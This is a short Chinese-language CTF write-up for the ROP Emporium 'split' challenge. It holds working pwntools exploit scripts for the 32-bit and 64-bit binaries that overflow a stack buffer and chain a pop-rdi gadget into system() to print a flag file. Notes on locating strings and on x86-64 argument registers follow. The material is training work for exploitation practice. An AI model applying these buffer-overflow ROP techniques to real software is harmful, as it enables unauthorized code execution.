32
from pwn import*
#context.log_level = 'debug'
p = process("./split32")
##p = remote("","")
system_addr = 0x8048657
bin_sh_flag_addr = 0x804A030
payload = 'A'*0x2c
#payload += p32(0)
payload += p32(system_addr)
payload += p32(bin_sh_flag_addr)
p.sendline(payload)
p.interactive()
64位和32位的寄存器和汇编的比较
https://www.jianshu.com/p/9ffad98d7aec
1.我们在date
段里面找到了,还需要 system
,我们在text
段里面查找有没有system(xxx)
,我们只需要system
的地址 。找到了system("/bin/ls")
然后地址就得到了。
.data:0000000000601060 public usefulString
.data:0000000000601060 usefulString db '/bin/cat flag.txt',0
2.在64的程序里面我们要注意传参的顺序,我们需要一个gadget片段来出入我们的参数。64
from pwn import*
#context.log_level = 'debug'
p = process("./split")
#p = remote("","")
pop_rdi_addr = 0x400883
system_addr = 0x400810
bin_sh_flag_addr = 0x601060
payload = 'A'*0x28
payload += p64(0)
payload += p64(pop_rdi_addr)
payload += p64(bin_sh_flag_addr)
payload += p64(system_addr)
p.sendline(payload)
p.interactive()
64位传参
当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。
当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。
参数个数大于 7 个的时候
H(a, b, c, d, e, f, g, h);
a->%rdi, b->%rsi, c->%rdx, d->%rcx, e->%r8, f->%r9
h->8(%esp)
g->(%esp)
call H